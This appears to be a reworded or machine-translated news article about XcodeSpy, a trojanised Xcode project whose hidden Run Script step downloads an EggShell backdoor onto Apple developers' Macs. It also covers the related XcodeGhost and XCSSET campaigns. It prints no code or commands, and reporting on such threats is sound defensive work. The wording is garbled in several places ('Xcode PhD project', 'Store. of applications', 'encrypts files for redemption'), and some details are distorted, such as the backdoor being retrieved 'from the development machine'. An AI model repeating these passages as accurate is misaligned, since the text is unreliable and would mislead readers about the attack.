Cybersecurity researchers unveiled a new attack on Thursday in which threats use Xcode as an attack vector to compromise Apple platform developers with a backdoor, adding to a growing trend involving targeting developers and researchers with malicious attacks .
Named “XcodeSpy”, the Xcode Trojan project is a modified version of a legitimate, open-source project available on GitHub called TabBarInteraction, used by developers to animate iOS tab bars based on user interaction.
“XcodeSpy is a malicious Xcode project that installs a custom version of the EggShell backdoor on the developer’s MacOS computer along with a persistence mechanism,” said SentinelOne researchers.
Xcode is Apple’s integrated development environment (IDE) for macOS, used to develop software for macOS, iOS, iPadOS, watchOS and tvOS.
Earlier this year, the Google Threat Analysis group unveiled a North Korean campaign for security researchers and developer exploitation that involved sharing a Visual Studio project designed to load malicious DLLs on Windows systems.
The Xcode PhD project does something similar, only this time the attacks highlighted Apple developers.
In addition to including the original code, XcodeSpy also contains a run script, which is executed when the developer’s development target is launched. The script then contacts an attacker-controlled server to retrieve a custom version of the EggShell backdoor from the development machine, which comes with capabilities for recording information from the victim’s microphone, camera, and keyboard.
“XcodeSpy takes advantage of an integrated feature of the Apple IDE, which allows developers to run a custom shell script when launching an instance of the target application,” the researchers said. “Although the technique is easy to identify if it is sought after, new or inexperienced developers who are unaware of the Run Script feature are particularly at risk, as there is no indication in the console or debugger to indicate the execution of the malicious script.”
SentinelOne said it had identified two variants of the EggShell payload, with samples uploaded to VirusTotal in Japan on August 5 and October 13 last year. Additional clues indicate an unnamed American organization that is said to have been targeted using this campaign between July and October 2020, other Asian developers are likely to be targeted.
Opponents have previously used contaminated Xcode executables (aka XCodeGhost) to inject malicious code into iOS applications compiled with infected Xcode without the knowledge of developers, and later use infected applications to collect information from devices once they are downloaded and installed from the Store. of applications.
Then, in August 2020, researchers at Trend Micro discovered a similar threat that spread through modified Xcode projects, which, at construction, were configured to install a malware called XCSSET to steal credentials, capture screenshots , sensitive messaging data and note-taking applications, and even encrypts files for redemption.
Like XCSSET, XcodeSpy takes an easier path, as the goal seems to be to hit the developers themselves, although the ultimate goal behind the operation and the identity of the group behind it remains unclear.
“Targeting software developers is the first step in a successful supply chain attack. One way to do this is to abuse the development tools needed to do this,” the researchers said.
“It is entirely possible that XcodeSpy was targeted at a particular developer or group of developers, but there are other potential scenarios with such high value victims. Attackers could simply search for interesting targets and gather data for future campaigns, or they could try to gather AppleID credentials for use in other campaigns that use malware with valid Apple Developer code signatures. “